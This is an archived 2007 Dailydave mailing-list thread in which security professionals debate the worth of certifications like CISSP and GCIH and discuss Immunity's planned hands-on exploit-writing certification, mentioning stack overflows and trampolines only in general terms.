[Dailydave] Information security certifications diversity andgetting lost

Mon Sep 10 14:54:43 EDT 2007

Dave,
  THat sounds like a really interesing idea but wouldnt win xp sp2 be more realistic? I would want someone at the basic level to at least understand trampolines as jmping straight to the stack would work on your test but is unrealistic in the real world.
Thanks, 
David Weston 
FGM, Inc 

-----Original Message-----
From: dailydave-bounces at lists.immunitysec.com on behalf of Dave Aitel
Sent: Mon 9/10/2007 6:46 AM
To: dailydave at lists.immunitysec.com
Subject: Re: [Dailydave] Information security certifications diversity	andgetting lost

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

One thing we've been working on here at Immunity are Network Offense
Professional certifications. Essentially it would be practical tests
that established someone was capable of doing certain actions we
should all be able to do.

For example, the first certification was a simple stack overflow
against Windows 2000. Testee's would exploit it using Immunity
Debugger/WinDBG and VisualSploit, which would keep it as technology
agnostic as possible. You can either write a simple Win32 overflow or
you can't.

We were going to launch it during DefCon, but had a few other things
going on. :>

- -dave

J.M. Seitz wrote:
> Hey Mike,
>
>> The CISSP is the undisputed king of information security
>> certifications. Currently, every now and then a security company
>> starts pushing their employees towards certification programs.
>> These are usually known for featuring insanely long exams,
>> absurdly pedantic requirements and other kinds of doubtfully
>> respectable necessities.
>
> I wouldn't say it's the king, I would say it has some very broad
> objectives, but is moreso a Security+ on steroids. When the CISSP
> got traction, you have to look at the timing of the certification,
> and the fact that the only other certification that would get you a
> high paying job was a CCIE, and the CCIE is a nasty cert to get to
> say the least. SANS has put out some incredibly strong programs
> that can range from technical (GCIH/GCFA/GREM) to CISSP-like
> certifications.
>
>
>> We all know that there are several other certifications, but
>> CISSP brings, without doubt, the very best. Be it a security
>> operations manager, a field operative or some other kind of
>> consulting freak, a CISSP will always deliver.
>
> I still disagree, and to be honest, I have interviewed more CISSP's
> that couldn't answer questions like "What does PKI stand for?",
> "Give me an analogy of a buffer overflow.","What is transparent
> proxying and why is it important in some circumstances?". Come on,
> certs are as good as the people who take them, I again disagree.
>
>
>> My question for people out there, is this madness _that_
>> necessary? Do we have a good reason for spending loads of budget
>> on certification programs and wasting our companies' money in
>> such investments?
>
> Yep, again it's a baseline, one for HR. The people to watch out for
> are the ones who go the extra mile, some who has a GCIH most
> definitely doesn't make me giggle with glee, but someone who has a
> GCIH Gold I look forward to meeting with, and definitely love to
> engage on their research topic. It's worth a company's time and
> money to do it (a) employees are more loyal to companies that give
> (b) you'd be amazed at how often you will apply things straight
> from a certification.
>
>> Employees feel constrained since they might lose the
>> certification after quitting their jobs, surfing towards another
>> employer as intrusive and wasteful as the previous one, etc.
>
> Not sure how you would lose a certification if you left your job?
> Once you write the exam, it's yours not your company's.
>
>> If certifications exist for ethical hackers, are we going to see
>> certifications for unethical hackers anytime soon? What if the
>> mob and shady underground organizations needed to certify that
>> they are employing the very best of the federal prison's Module
>> 5? Will a Certified Unethical Software Security Expert (CUSSE)
>> certification ever exist? "My name is Lincoln Six Echo, Certified
>> Information Insecurity Systems Professional".
>
> http://blog.wired.com/27bstroke6/2007/08/a-look-inside-a.html
>
> There ya go :) I bet one or two unscrupulous people are
> "black-belts" :)
>
> In the end, certifications are good, but the reality is that they
> are only good if you are looking for work, and you get what you put
> into them. You want to get noticed in the security world? Build a
> tool, join and help people on forums, help Sourcefire write
> signatures (they need it), contact George Theall at Tenable and ask
> if you can help write NASL plugins, help the OSVDB with mangling.
> These are all things that will help round out a newcomer, and add
> it to the list of things that can benefit you when its time to go
> job hunting. Now, if you _really_ want to get noticed, tackle the
> tough problems, write books, and try to talk at Black Hat, etc.
>
> Coming from an unknown security guy, low profile, I am still in the
> phase of doing all of these things. As such I have a Sec+ and a
> GCIH (which I am wrapping up my research paper on), and I can
> honestly say I do use some of it in my day-to-day. You don't see
> these acronyms on my email signature but that's because I am not
> looking for work :)
>
> JS
>
>
>
> _______________________________________________ Dailydave mailing
> list Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFG5Uq/B8JNm+PA+iURAl+CAKDAkJkhJvSNf+lIAtF55A6IotizfgCgtZiP
od5Gzue0h/Q6P4MTq5E7/pM=
=VXSu
-----END PGP SIGNATURE-----

_______________________________________________
Dailydave mailing list
Dailydave at lists.immunitysec.com
http://lists.immunitysec.com/mailman/listinfo/dailydave

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070910/432e99ef/attachment.htm 